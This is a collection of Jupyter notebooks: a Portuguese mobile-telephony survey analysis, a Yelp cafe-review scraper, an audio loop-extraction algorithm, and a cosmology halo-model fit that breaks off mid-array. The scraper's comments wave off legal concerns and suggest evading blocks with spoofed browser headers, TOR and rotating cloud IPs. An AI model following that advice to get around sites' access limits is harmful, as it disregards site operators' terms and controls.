bd_pre.COD_IBGE.value_counts() # Nos itens em que não há informação do código do IBGE será inserido o código 0. bd_pre.COD_IBGE.replace('',0, inplace = True) bd_pre.COD_IBGE.value_counts() # ### Distribuição das amostras # Com todas as transformações realizadas no item anterior, é possível ter uma ideia melhor da distribuição de cada coluna com valor numérico: bd_pre.describe().T stats = bd_pre.describe().T.sort_values('std') #colunas organizadas em ordem crescente do desvio padrão # Colunas com desvio padrão nulo, ou seja, que possuem apenas uma resposta e, portanto, não vão influenciar os modelos, são removidas da base para otimizar o processamento. valor_unico = stats[stats['std'] == 0].T.columns.sort_values().tolist() valor_unico valor_unico.append('TIPO') valor_unico #remover colunas bd_pre.drop(valor_unico, axis = 1, inplace = True) bd_pre.info() # ### Variável resposta # Como o objetivo é criar um classificador para as respotas da pergunta J1, primeiro serão analisadas as respostas faltantes (99): (bd_pre[bd_pre['J1'] == 99].shape[0]/bd_pre.shape[0])*100 # Como apenas 0,15% da amostra não possui resposta, essas linhas serão removidas da base. bd_pre['J1'].replace(99, np.nan, inplace = True) bd_pre.dropna(subset = ['J1'], inplace = True) bd_pre.info() # Por fim, será gerada uma nova coluna com a classificação conforme a nota: # **Alta**, para notas maiores ou iguais a 8, ou **baixa**. bd_pre['Resposta'] = np.where(bd_pre.J1 >= 8, 'Alta', 'Baixa') bd_pre.head() # # Análise gráfica # ## Comparação do nível de satisfação sns.set(style="ticks", palette="pastel") # Antes de iniciar as comparações, segue a distribuição da nota de avaliação: bd_pre.J1.hist() # Para ter uma ideia das avaliações, serão feitas comparações em percentual da resposta por operadora, estado e data da entrevista. Para facilitar, será criada uma função: formatter = PercentFormatter() def grafico_pct(col_name, group = 0): temp = pd.crosstab(index = bd_pre[col_name],columns = bd_pre['Resposta']) temp.div(temp.sum(axis = 1), axis = 0).mul(100).plot(kind='bar', stacked=False, zorder=3, figsize = (15,8), color =["g", "r"]) plt.gca().yaxis.set_major_formatter(formatter) plt.grid(zorder=0) plt.legend(loc = 'upper right') # ### Por Operadora grafico_pct('OPERADORA') # Oi e Tim são as únicas operadoras com mais notas baixas do que altas, enquanto Nextel é a operadora com melhor avaliação. # ### Por Região # - Estado grafico_pct('ESTADO') # AL é o estado com melhor avaliação, enquanto DF é o de pior nota. # ### Por Data # Busca de relações com dia da semana, mês e ano da entrevista em números absolutos. # Função para gerar os gráficos: def analise_data(col_name, group = 0): week_days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'] if group == 'week_day': bd_pre[col_name] = bd_pre.DATA.dt.strftime('%A') bd_pre[col_name] = pd.Categorical(bd_pre[col_name], categories = week_days, ordered=True) elif group == 'month': bd_pre[col_name] = bd_pre.DATA.dt.strftime('%m') #bd_pre.groupby(col_name).count().sort_values(col_name) temp = pd.crosstab(index = bd_pre[col_name],columns = bd_pre['Resposta']) temp.plot(kind='bar', stacked=False, zorder=3, figsize = (15,8), color =["g", "r"]) plt.grid(zorder=0) plt.legend(loc = 'upper right') # - Dia da semana analise_data('DIA_SEMANA','week_day') analise_data('MES','month') # Aparentemente existe uma concentração da quantidade de entrevistados no segundo semestre do ano, exceto pelo último mês. grafico_pct('MES') bd_pre.MES = bd_pre.MES.astype(int) # Olhando a distribuição percentual, é possível ver melhor a diferença entre as avaliações para cada mês. # - Anual analise_data('ANO_BASE') # ## Matriz de correlação # Para nortear o restante da análise gráfica, vamos observar a correlação com a nota da resposta ('J1') corr_matrix = bd_pre.corr() corr_matrix['J1'].sort_values(ascending = False) maiores_corr = corr_matrix[corr_matrix['J1'] > 0.5]['J1'].sort_values(ascending = False).index.tolist() maiores_corr.append('Resposta') #maiores_corr.append('ESTADO') #maiores_corr.append('OPERADORA') maiores_corr.append('H2') maiores_corr.remove('J1') sns.set(style="ticks", palette="pastel") sns.pairplot(data = bd_pre[maiores_corr], hue = 'Resposta', palette=["r", "g"]) # Pelos gráficos, a única conclusão evidente é a quantidade de respostas de renda não informada. Devido a isso, vamos olhar mais de perto esses dados. # ### Renda (H2, H2a e H2b) grafico_pct('H2a') plt.legend(loc = 'lower right') # Aparentemente, quanto maior a faixa de renda, pior a avaliação. Além disso, aqueles que não informaram a renda avaliaram bem o serviço em sua pequena maioria. sns.scatterplot(data = bd_pre, x = 'H2b', y = 'J1', hue = 'Resposta') sns.scatterplot(data = bd_pre[bd_pre['H2'] == 0], x = 'H2b', y = 'J1', hue = 'Resposta') sns.boxplot(data = bd_pre, x = 'OPERADORA', y = 'H2b', hue = 'Resposta', palette=["r", "g"]) plt.xticks(rotation=90) plt.legend(loc = 'lower right') # ### Comprometimento da operadora # + active="" # B1_2: Nota atribuída com respeito ao comprometimento da operadora em cumprir o que foi prometido e divulgado em sua publicidade. # - sns.set(style="ticks", palette="pastel") sns.boxplot(data = bd_pre, y = 'B1_2', x = 'OPERADORA', hue = 'Resposta', palette=["r", "g"] ) plt.xticks(rotation=90) plt.legend(loc = 'lower right') grafico_pct('B1_2') # Observa-se também as variáveis menos correlacionadas: # Idade do entrevistado e faixa etária vs Operadora sns.boxplot(data = bd_pre, x = 'OPERADORA', y = 'Q8', hue = 'Resposta', palette=["r", "g"]) grafico_pct('Q8a') plt.legend(loc = 'lower right') # Ao contrário da renda, quanto maior a idade, melhor a avaliação. # - Q9 - Sexo do entrevistado grafico_pct('Q9') # Apesar de a pesquisa não incluir gêneros não-binários, no geral, homens deram notas mais baixas do que mulheres. # # Arquivo de saída # Para criar e executar os modelos em R, é gerada uma base em csv: bd_pre.to_csv('data/base_pre.csv', index = False) # # Conclusões # Conforme enunciado do trabalho, os dados foram tratados no Python para posterior modelagem no R: # - Para a variável resposta, J1, como apenas 0,15% eram de dados faltantes, essas linhas foram removidas da base # - Tratamento de dados faltantes foi feito tratado como não resposta em 'A1_1', 'A1_2', 'A1_3', 'A1_4' # - Respostas do Tipo 1 foram todas padronizadas pra 1: sim e 2: não # - Para facilitar a vizualização, as respostas não dadas (99) de todas as perguntas do Tipo 2 foram substituídas por -1 # - Na questão Q8, valores NA foram substituídos pela média da idade de cada faixa # - Colunas com desvio padrão nulo, ou seja, que possuem apenas uma resposta e, portanto, não vão influenciar os modelos, foram removidas da base para otimizar o processamento: 'A1_2', 'Q1', 'Q2', 'Q3', 'Q4', 'Q6', 'Q7' # - Optou-se por padronizar algumas respostas realizadas em momentos diferentes e que mudam ao longo dos anos # - H2 e H2a: respostas 999997, 999998, 999999 foram substituídas por NaN; como alguns modelos não aceitam valores faltantes, todos eles foram susbtituídos por 0; além disso, cerca de 6% da base teve informação de renda preenchida pela faixa em uma nova coluna: H2b # # Referências # As principais referências utilzadas para produção deste relatório foram: # # - Material de aula do curso Computação para Ciência de Dados # - [Dicas do dia](https://github.com/danielscarvalho/Insper-DS-Dicas) # - [Índice - Table of Contents](https://github.com/jupyterlab/jupyterlab-toc) # - https://stackoverflow.com/questions/21151450/how-can-i-add-a-table-of-contents-to-a-jupyter-jupyterlab-notebook # - [Base de dados original e documentação](http://dados.gov.br/dataset/banco-de-dados-da-pesquisa-telefonia-movel-pre-paga) # - [pandas](https://pandas.pydata.org) # - [matplotlib](https://matplotlib.org) # - [pandas ods reader](https://github.com/iuvbio/pandas_ods_reader) # - [Portal Brasileiro de Dados Abertos - Salário Mínimo](http://www.dados.gov.br/dataset/salario-minimo/resource/8b9ccf0d-aff2-499f-8363-0fcd44ec68b3) # - [IPEADATA](http://www.ipeadata.gov.br/Default.aspx)
Processamento.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from urllib.request import urlopen import requests from bs4 import BeautifulSoup import numpy as np import pandas as pd import re import time import random # + """ Legal Issues: Don't worry about it. But keep note, I should respect robots.txt But if I do collect the data, DO NOT give it to others. Just don't sell or advertise that the data is mine. Don't mess with financial or gov data. Don't infringe on actual copyright stuff. Don't enter anything that requires permission, passwords. Don't scrape emails, usernames. Don't spam forms. """ """ Dealing With HTTP Errors: Don't move scrapers too quickly. Change headers. Don't anything a human wouldn't. """ """ Scraping Remotely: Use TOR browser (bounces IP address) DuckDuckGo does not store cookies Scrape on Google Cloud. Has access to changing IP addresses. """ # - session = requests.Session() headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'} ''' Go to starting page. Gather all the links in that one page. Go to next page. Repeat. Stop when the page does not exist. Problem: the page exists even when it shouldn't Example: searching &start=1000 seems to produce the first page Solution: need to create a numpy array of links, append the new links if the new links are not found stop if the links are found Current Solution (going to change this): Specify a limit ''' # + def gather_Yelp_data(url, cap_num): """ Given a starting url and a page limit, gather all the links to businesses. Go to the next page. Gather all links. Repeat a specified number of times. Return a numpy array of all links gathered. """ item_number = 0 websites = np.array([]) while item_number <= cap_num: try: #html = urlopen(url + "&start=" + str(item_number*10)) #bs = BeautifulSoup(html.read(), 'lxml') req = session.get(url + "&start=" + str(item_number*10), headers=headers) bs = BeautifulSoup(req.text, 'lxml') links = bs.findAll('a', {'class': "biz-name js-analytics-click"}) for link in links: #print (link) link_string = link.attrs['href'] websites = np.append(websites, np.array([link_string])) except: pass time.sleep (random.random()) item_number += 1 return websites starturl = """https://www.yelp.com/search?find_desc=cafe&find_loc=60637""" start_time = time.time() sites = gather_Yelp_data(starturl, 0) print("--- %s seconds ---" % (time.time() - start_time)) sites # + """ Huge Problem of Inconsistency: Sometimes things are returned, others nothing is returned. Why? I don't know. Running the same thing returns different results. So how do I know when I'm not getting any result? Label Them """ def gather_Yelp_data(url, cap_num): item_number = 0 websites = [] num_label = [] while item_number <= cap_num: try: req = session.get(url + "&start=" + str(item_number*10), headers=headers) bs = BeautifulSoup(req.text, 'lxml') links = bs.findAll('a', {'class': "biz-name js-analytics-click"}) for link in links: link_string = link.attrs['href'] websites.append (link_string) num_label.append (item_number) except: pass time.sleep (random.random()) item_number += 1 return pd.DataFrame ({'Link':websites, 'Num': num_label}), cap_num starturl = """https://www.yelp.com/search?find_desc=cafe&find_loc=60637""" yelp_page_num = 0 start_time = time.time() sites, yelp_page_num = gather_Yelp_data(starturl, yelp_page_num) print("--- %s seconds ---" % (time.time() - start_time)) sites # - req = session.get(starturl + "&start=" + str(0), headers=headers) bs = BeautifulSoup(req.text, 'lxml') links = bs.findAll('a', {'class': "biz-name js-analytics-click"}) for link in links: link_string = link.attrs['href'] print (link_string) websites = [] # + ''' Going to have to search by zip code. There are 42000 zip codes in US. How do we find the number of cafes in Yelp? Take a random sample (say 30) of zip codes. Search Yelp through the Zip Code. Find average number of businesses. Multiply that by 42000 ''' ''' import random for x in range(30): print (random.randint(10000,99999)) ''' num_cafes = [ 21, 10, 69, 33, 21, 55, 18, 39, 16, 47, 16, 24, 16, 37, 28, 26, 8, 37, 22, 5, 81 ] average_num_Cafe = sum(num_cafes) / len (num_cafes) # 29.952380952380953 num_cafe_in_US = average_num_Cafe * 43000 # 1287952 ''' About 1.945 seconds per visited webpage (10 business for one webpage) Then about 69.6 hours for visiting all webpages and collecting websites. About 7.5 seconds per taking all review pages of a single business. About 3.3 seconds to take all additional info. 10.8 seconds total. So then 161 days. ''' print (num_cafe_in_US) # - # + """ Scraping an individual business: Information that I want: Address Pricing Health Score Extra info on the right Reviews """ def getBasicInfo(url): """ Given url of one business, gather all basic info except the reviews. Returns a dictionary. """ dict_of_info = {} html = urlopen(url) bs = BeautifulSoup(html.read(), 'lxml') dict_of_info['Address'] = bs.find_all('address')[-1].text price_and_health = bs.find_all('dd', {'class': 'nowrap'}) dict_of_info['Price Range'] = price_and_health[0].text try: dict_of_info['Health Score'] = price_and_health[1].text except: pass more_biz_info = bs.find('div', {'class': "short-def-list"}).find_all('dl',) for info in more_biz_info: dict_of_info[info.find('dt').text] = info.find('dd').text return dict_of_info start_time = time.time() greenline_coffee = """https://www.yelp.com/biz/greenline-coffee-chicago""" greenline = getBasicInfo(greenline_coffee) print("--- %s seconds ---" % (time.time() - start_time)) # + def clear_white_space(i_dict): for key in i_dict.keys(): i_dict[key.strip()] = i_dict.pop(key) for key in i_dict.keys(): i_dict[key] = i_dict[key].strip() return i_dict greenline = clear_white_space(clear_white_space (greenline)) # clear it twice greenline # - """ Now to get the reviews: Want: star number date content """ def get_reviews_in_single_page(bs): """ Given a parsed url, get all review info in a single page. Returns a df. """ review_dict = {} # this gets the box of info of Yelp review review_form = bs.find( 'ul', {'class': "ylist ylist-bordered reviews"} ).find_all( 'div', {'class': "review-wrapper"}) rating_list = [] date_list = [] comment_list = [] for review in review_form[1:]: # gets number of stars rating_list.append( review.find('div', {'class': re.compile('i-stars i-stars--regular-.*')}).img.attrs['alt']) # gets dates date_list.append( review.find('span', {'class': "rating-qualifier"}).text) # gets comments comment_list.append( review.find('p', {'lang': "en"}).text) review_dict['Star Ratings'] = rating_list review_dict['Date'] = date_list review_dict['Comment'] = comment_list return pd.DataFrame(review_dict) # + def get_all_reviews(url, page_limit): page_num = 0 review_df = pd.DataFrame() review_url = url while page_num <= page_limit: html = urlopen(review_url) bs = BeautifulSoup(html.read(), 'lxml') review_df = review_df.append(get_reviews_in_single_page(bs)) page_num += 1 review_url = url + '?start=' + str(page_num * 20) # 20 reviews in each page review_df = review_df.drop_duplicates(['Comment']) # .reset_index().drop('index',axis=1) return review_df start_time = time.time() greenline_coffee_reviews = get_all_reviews(greenline_coffee, 2) print("--- %s seconds ---" % (time.time() - start_time)) greenline_coffee_reviews # - # Test code on a different business sanc_url = """https://www.yelp.com/biz/sanctuary-cafe-chicago?osq=cafe""" sanctuary_cafe = getBasicInfo(sanc_url) sanctuary_cafe = clear_white_space(clear_white_space(sanctuary_cafe)) sanctuary_cafe sanctuary_cafe_reviews = get_all_reviews(sanc_url, 2) sanctuary_cafe_reviews greenline_coffee_reviews.to_csv('Greenline Coffee Reviews.csv')
Yelp/Scraping/.ipynb_checkpoints/Scraping Yelp For Websites-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import copy import librosa import madmom import numpy as np import os import tensorly import tensorly.decomposition as tld from sklearn.decomposition import NMF def run_algorithm(audio_file, n_templates=[0,0,0], output_savename="extracted_loop"): """Complete pipeline of algorithm. Parameters ---------- audio_file : string Path to audio file to be loaded and analysed. n_templates : list of length 3 The number of sound, rhythm and loop templates. Default value (0,0,0) causes the script to estimate reasonable values. output_savename: : string Base string for saved output filenames. Returns ------- A set of files containing the extracted loops. Examples -------- >>> run_algorithm("example_song.mp3", [40,20,7], "extracted_loop") See also -------- tensorly.decomposition.non_negative_tucker """ assert os.path.exists(audio_file) assert len(n_templates)==3 assert type(n_templates) is list # Load mono audio: signal_mono, fs = librosa.load(audio_file, sr=None, mono=True) # Use madmom to estimate the downbeat times: downbeat_times = get_downbeats(signal_mono) # Convert times to frames so we segment signal: downbeat_frames = librosa.time_to_samples(downbeat_times, sr=fs) # Create spectral cube out of signal: spectral_cube = make_spectral_cube(signal_mono, downbeat_frames) # Validate the input n_templates (inventing new ones if any is wrong): n_sounds, n_rhythms, n_loops = validate_template_sizes(spectral_cube, n_templates) # Use TensorLy to do the non-negative Tucker decomposition: core, factors = tld.non_negative_tucker(np.abs(spectral_cube), [n_sounds, n_rhythms, n_loops], n_iter_max=500, verbose=True) # Reconstruct each loop: for ith_loop in range(n_loops): # Multiply templates together to get real loop spectrum: loop_spectrum = create_loop_spectrum(factors[0], factors[1], core[:,:,ith_loop]) # Choose best bar to reconstruct from (we will use its phase): bar_ind = choose_bar_to_reconstruct(factors[2], ith_loop) # Reconstruct loop signal by masking original spectrum: ith_loop_signal = get_loop_signal(loop_spectrum, spectral_cube[:,:,bar_ind]) # Write signal to disk: librosa.output.write_wav("{0}_{1}.wav".format(output_savename,ith_loop), ith_loop_signal, fs) def get_downbeats(signal): """Use madmom package to estimate downbeats for an audio signal. Parameters ---------- signal : np.ndarray [shape=(n,), dtype=float] Input mono audio signal. Returns ------- downbeat_times : np.ndarray [shape=(n,), dtype=float] List of estimated downbeat times in seconds. Examples -------- >>> signal_mono, fs = librosa.load("example_song.mp3", sr=None, mono=True) >>> get_downbeats(signal_mono) array([1.000e-02, 1.890e+00, 3.760e+00, 5.630e+00, 7.510e+00, 9.380e+00, 1.126e+01, 1.313e+01, 1.501e+01, 1.688e+01, 1.876e+01, 2.064e+01, 2.251e+01, 2.439e+01, 2.626e+01, 2.814e+01, 3.002e+01, 3.189e+01, 3.376e+01, 3.564e+01, 3.751e+01, 3.939e+01, 4.126e+01, 4.314e+01, 4.501e+01, 4.689e+01, 4.876e+01, 5.063e+01, 5.251e+01, 5.439e+01, 5.626e+01, 5.813e+01]) See Also -------- madmom.features.downbeats.RNNDownBeatProcessor madmom.features.downbeats.DBNDownBeatTrackingProcessor """ act = madmom.features.downbeats.RNNDownBeatProcessor()(signal) proc = madmom.features.downbeats.DBNDownBeatTrackingProcessor(beats_per_bar=[3, 4], fps=100) processor_output = proc(act) downbeat_times = processor_output[processor_output[:,1]==1,0] return downbeat_times def make_spectral_cube(signal_mono, downbeat_frames): """Convert audio signal into a spectral cube using specified downbeat frames. An STFT is taken of each segment of audio, and these STFTs are stacked into a 3rd dimension. The STFTs may have different lengths; they are zero-padded to the length of the longest STFT. Parameters ---------- signal_mono : np.ndarray [shape=(n,), dtype=float] one-dimensional audio signal to convert downbeat_frames : np.ndarray [shape=(n,), dtype=int] list of frames separating downbeats (or whatever time interval is desired) Returns ------- tensor : np.ndarray [shape=(n1,n2,n3), dtype=complex64] tensor containing spectrum slices Examples -------- >>> signal_mono, fs = librosa.load("example_song.mp3", sr=None, mono=True) >>> downbeat_times = get_downbeats(signal_mono) >>> downbeat_frames = librosa.time_to_samples(downbeat_times, sr=fs) >>> spectral_cube = make_spectral_cube(signal_mono, downbeat_frames) >>> spectral_cube.shape (1025, 162, 31) >>> spectral_cube[:2,:2,:2] array([[[ 18.08905602+0.00000000e+00j, -20.48682976+0.00000000e+00j], [-16.07670403+0.00000000e+00j, -44.98669434+0.00000000e+00j]], [[-19.45080566+3.66026653e-15j, -8.5700922 +3.14418630e-16j], [ 1.01680577-3.67251587e+01j, 35.03190231-2.13507919e+01j]]]) """ assert len(signal_mono.shape) == 1 # For each span of audio, compute the FFT using librosa defaults. fft_per_span = [librosa.core.stft(signal_mono[b1:b2]) for b1,b2 in zip(downbeat_frames[:-1],downbeat_frames[1:])] # Tensor size 1: the number of frequency bins freq_bins = fft_per_span[0].shape[0] # Tensor size 2: the length of the STFTs. # This could vary for each span; use the maximum. rhyt_bins = np.max([fpb.shape[1] for fpb in fft_per_span]) # Tensor size 3: the number of spans. bar_bins = len(fft_per_span) tensor = np.zeros((freq_bins, rhyt_bins, bar_bins)).astype(complex) for i in range(bar_bins): tensor[:,:fft_per_span[i].shape[1],i] = fft_per_span[i] return tensor def validate_template_sizes(spectral_cube, n_templates): """Ensure that specified number of estimated templates are valid. Values must be greater than 1 and strictly less than the corresponding dimension of the original tensor. So, if the tensor has size [1025,100,20], then n_templates = [99,99,10] is valid (though unadvised), while n_templates = [30,20,20] is invalid. If ANY of the values for n_templates are invalid, than get_recommended_template_sizes() is used to obtain replacement values for n_templates. Parameters ---------- spectral_cube : np.ndarray [shape=(n1,n2,n3)] Original tensor to be modeled. n_templates : list [shape=(3,), dtype=int] Proposed numbers of templates. Returns ------- output_n_templates : np.ndarray [shape=(3,), dtype=int] Validated numbers of templates. Examples -------- >>> validate_template_sizes(np.zeros((1025, 162, 31)), [100, 50, 20]) array([100, 50, 20]) >>> validate_template_sizes(np.zeros((1025, 162, 31)), [0, 0, 0]) array([63, 21, 7]) >>> validate_template_sizes(np.zeros((1025, 162, 31)), [100, 50, 40]) array([63, 21, 7]) See Also -------- get_recommended_template_sizes """ max_template_sizes = np.array(spectral_cube.shape) - 1 min_template_sizes = np.ones_like(max_template_sizes) big_enough = np.all(min_template_sizes <= n_templates) small_enough = np.all(n_templates <= max_template_sizes) valid = big_enough & small_enough if valid: return n_templates else: return get_recommended_template_sizes(spectral_cube) def purify_core_tensor(core, factors, new_rank, dim_to_reduce=2): """Reduce the size of the core tensor by modelling repeated content across loop recipes. The output is a more "pure" set of loop recipes that should be more distinct from each other. Parameters ---------- core : np.ndarray [shape=(n1,n2,n3)] Core tensor to be compressed. factors : list [shape=(3,), dtype=np.ndarray] List of estimated templates new_rank : int The new size for the core tensor dim_to_reduce : int The dimension along which to compress the core tensor. (Default value 2 will reduce the number of loop types.) Returns ------- new_core : np.ndarray [shape=(n1,n2,new_rank)] Compressed version of the core tensor new_factors : list [shape=(3,), dtype=np.ndarray] New list of templates. Note: two templates will be the same as before; only the template for the compressed dimension will be different. """ assert new_rank < core.shape[dim_to_reduce] X = tensorly.unfold(core,dim_to_reduce) model = NMF(n_components=new_rank, init='nndsvd', random_state=0) W = model.fit_transform(X) H = model.components_ # Re-construct core tensor and factors based on NMF factors from core tensor: new_shape = list(core.shape) new_shape[dim_to_reduce] = new_rank new_core = tensorly.fold(H, dim_to_reduce, new_shape) new_factors = copy.copy(factors) new_factors[dim_to_reduce] = np.dot(factors[dim_to_reduce],W) return new_core, new_factors def get_recommended_template_sizes(spectral_cube): """Propose reasonable values for numbers of templates to estimate. If a dimension of the tensor is N, then N^(6/10), rounded down, seems to give a reasonable value. Parameters ---------- spectral_cube : np.ndarray [shape=(n1,n2,n3)] Original tensor to be modeled. Returns ------- recommended_sizes : np.ndarray [shape=(len(spectral_cube.shape),), dtype=float] Suggested number of templates. Examples -------- >>> get_recommended_template_sizes(np.zeros((100,200,300))) array([15, 23, 30]) >>> get_recommended_template_sizes(np.zeros((4,400,40000))) array([ 1, 36, 577]) """ max_template_sizes = np.array(spectral_cube.shape) - 1 min_template_sizes = np.ones_like(max_template_sizes) recommended_sizes = np.floor(max_template_sizes**.6).astype(int) recommended_sizes = np.max((recommended_sizes, min_template_sizes),axis=0) assert np.all(min_template_sizes <= recommended_sizes) assert np.all(recommended_sizes <= max_template_sizes) return recommended_sizes def create_loop_spectrum(sounds, rhythms, core_slice): """Recreate loop spectrum from a slice of the core tensor and the first two templates, the sounds and rhythms. Parameters ---------- sounds : np.ndarray [shape=(n_frequency_bins, n_sounds), dtype=float] The sound templates, one spectral template per column. rhythms : np.ndarray [shape=(n_time_bins, n_rhythms), dtype=float] The rhythm templates, or time-in-bar activations functions. One rhythm template per column. core_slice : np.ndarray [shape=(n_sounds, n_rhythms)] A slice of the core tensor giving the recipe for one loop. Returns ------- loop_spectrum : np.ndarray [shape=(n_frequency_bins, n_time_bins), dtype=float] Reconstruction of spectrum. Examples -------- >>> np.random.seed(0) >>> factors = [np.abs(np.random.randn(1025, 63)), np.abs(np.random.randn(162, 21)), np.abs(np.random.randn(31, 7))] >>> core = np.abs(np.random.randn(63,21,7)) >>> create_loop_spectrum(factors[0], factors[1], core[:,:,0]) array([[727.4153606 , 728.64591236, 625.76726056, ..., 512.94167141, 592.2098947 , 607.10457107], [782.11991843, 778.09690543, 682.71895323, ..., 550.43525375, 636.51448493, 666.35600624], [733.96209316, 720.17586837, 621.80762807, ..., 501.51192504, 590.14018676, 605.44147057], ..., [772.43712078, 758.88473642, 654.35159419, ..., 522.69754588, 628.84580165, 641.66347072], [677.58720601, 666.52484723, 583.92269705, ..., 471.24362278, 558.17441475, 573.31864635], [768.96634561, 758.85553214, 639.21515256, ..., 525.83186141, 634.04799161, 644.35772338]]) """ loop_spectrum = np.dot(np.dot(sounds, core_slice), rhythms.transpose()) return loop_spectrum def choose_bar_to_reconstruct(loop_templates, ith_loop): """...Choose... bar... to... reconstruct! For now, it just choose the bar with the largest activation. More information could / should be included, like reducing cross-talk, which would mean considering the activations (but ideally the relative *loudnesses*) of the other loops. Parameters ---------- loop_templates : np.ndarray [shape=(n_bars, n_loop_types), dtype=float] The loop activation templates, one template per column. ith_loop : int The index of the loop template. Returns ------- bar_ind : int The index of the bar to choose. Examples -------- >>> np.random.seed(0) >>> factors = [np.abs(np.random.randn(1025, 63)), np.abs(np.random.randn(162, 21)), np.abs(np.random.randn(31, 7))] >>> choose_bar_to_reconstruct(factors[2], 0) 10 """ bar_ind = np.argmax(loop_templates[:,ith_loop]) return bar_ind def get_loop_signal(loop_spectrum, original_spectrum): """Reconstruct the signal for a loop given its spectrum and the original spectrum. The original spectrum is used as the basis, and the reconstructed loop spectrum is used to mask the spectrum. Parameters ---------- loop_spectrum : np.ndarray [shape=(n_freq_bins, n_time_bins_1), dtype=float] Reconstructed loop spectrum (real) original_spectrum : np.ndarray [shape=(n_freq_bins, n_time_bins_2), dtype=complex] Original spectrum (complex; possibly different length of time) Returns ------- signal : np.ndarray [shape=(n,), dtype=float] Estimated signal of isolated loop. Examples -------- >>> np.random.seed(0) >>> random_matrix = np.random.randn(1025,130) >>> loop_spectrum = np.abs(random_matrix) / np.max(random_matrix) >>> random_matrix_2 = np.random.randn(1025,130) >>> loop_spectrum_2 = np.abs(random_matrix_2) / np.max(random_matrix_2) >>> get_loop_signal(loop_spectrum, loop_spectrum_2) array([-5.7243928e-04, -2.3625907e-04, -3.8087784e-04, ..., 9.2569360e-05, 3.9195133e-04, -2.4777438e-04], dtype=float32) See also -------- librosa.util.softmask """ assert loop_spectrum.shape[0] == original_spectrum.shape[0] min_length = np.min((loop_spectrum.shape[1], original_spectrum.shape[1])) orig_mag, orig_phase = librosa.magphase(original_spectrum) mask = librosa.util.softmask(loop_spectrum[:,:min_length], orig_mag[:,:min_length], power=1) masked_spectrum = original_spectrum[:,:min_length] * mask signal = librosa.core.istft(masked_spectrum) return signal run_algorithm("mix1.wav", n_templates=[0,0,0], output_savename="extracted_loop") # # Prototype import pygame pygame.mixer.init() sound = pygame.mixer.Sound("extracted_loop_1.wav") sound2 = pygame.mixer.Sound("extracted_loop_12.wav") sound3 = pygame.mixer.Sound("extracted_loop_15.wav") sound.play(-1) sound2.play(-1) sound3.play(-1) pygame.quit() # import pygame # import pygame # pygame.init() # pygame.display.set_mode(pygame.display.list_modes()[-1]) # smallest resolution available # pygame.mixer.init() # pygame.mixer.music.load("sample1.wav") # pygame.mixer.music.play(5) # repeat 5 times # pygame.mixer.music.queue("sample2.wav") # queue test2.wav after test.wav plays 5 times # clock = pygame.time.Clock() # clock.tick(10) # while pygame.mixer.music.get_busy(): # pygame.event.poll() # clock.tick(10)
Applications/Looper.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:hodemulator] # language: python # name: conda-env-hodemulator-py # --- from itertools import izip from time import time import numpy as np import astropy from pearce.mocks.customHODModels import * from pearce.mocks import cat_dict from scipy.optimize import minimize from SloppyJoes import lazy_wrapper from matplotlib import pyplot as plt # %matplotlib inline import seaborn as sns sns.set() AB = True # + PRIORS = {'f_c': (0, 1), 'alpha': (0, 2), 'logMmin':(10,14), 'logM1': (10, 15), 'logM0': (9,15), 'sigma_logM': (0.3, 1.5), 'logMcut': (9,15), 'logMlin':(9,15), 'f_cen': (0.0,1.0)} _cens_model = RedMagicCens cens_model = _cens_model(z = 0.0) #cens_model = AssembiasReddick14Cens() _sats_model = RedMagicSats #sats_model = AssembiasReddick14Sats() cosmo_params = {'simname':'chinchilla', 'Lbox':400.0, 'scale_factors':[0.658, 1.0]} cat = cat_dict[cosmo_params['simname']](**cosmo_params)#construct the specified catalog! cat.load(1.0, HOD=(_cens_model, _sats_model), hod_kwargs = {'cenocc_model': cens_model}) LBOX = 400.0 #sats_model.modulate_with_cenocc = False # - cat.model.model_dictionary cens_model = cat.model.model_dictionary['centrals_occupation'] sats_model = cat.model.model_dictionary['satellites_occupation'] def resids(theta,params,cens_occ, sats_occ,mbc): cens_model.param_dict['f_c'] = 1.0 sats_model.param_dict['f_c'] = 1.0 cat.model.param_dict['f_c'] = 1.0 cens_model.param_dict.update({p:x for p, x in izip(params, theta)}) sats_model.param_dict.update({p:x for p, x in izip(params, theta)}) cat.model.param_dict.update({p:x for p, x in izip(params, theta)}) cens_preds = cens_model.mean_occupation(prim_haloprop = mbc) sats_preds = sats_model.mean_occupation(prim_haloprop = mbc) #Weird edge cases can occur? cens_preds[cens_preds < 1e-9] = 0 sats_preds[sats_preds < 1e-9] = 0 cens_vars = cens_preds*(1-cens_preds)+1e-6 sats_vars = sats_preds + 1e-6 Ngal_pred = np.sum(cens_preds+sats_preds) Ngal_obs = np.sum(cens_occ+sats_occ) idx = sats_occ > 0 #log_sats_diff = (np.log10(sats_preds) - np.log10(sats_occ) ) #log_sats_diff[np.isnan(log_sats_diff)] = 0.0 #log_sats_diff[log_sats_diff == -np.inf] = 0.0 #log_sats_diff[log_sats_diff == np.inf] = 0.0 return np.r_[ (cens_preds-cens_occ),sats_preds-sats_occ, np.array([Ngal_pred-Ngal_obs]) ] #return np.r_[cens_preds[0,:]-cens_occs[0,:], Ngal_pred-Ngal_obs] catalog = astropy.table.Table.read('/u/ki/swmclau2/des/AB_tests/abmatched_halos.hdf5', format = 'hdf5') mag_cut = -21 min_ptcl = 200 if AB: catalog = catalog[np.logical_and(catalog['halo_mvir'] > min_ptcl*cat.pmass, catalog['halo_vpeak_mag'] <=mag_cut)] else: catalog = catalog[np.logical_and(catalog['halo_mvir'] > min_ptcl*cat.pmass, catalog['halo_vvir_mag'] <=mag_cut)] # + active="" # if not AB: # MAP = np.array([ 12.64539386, 14.15396837, 0.52641264, 0.22234201, # 14.34871275, 1.07989646, 12.81902682]) # else: # MAP = np.array([ 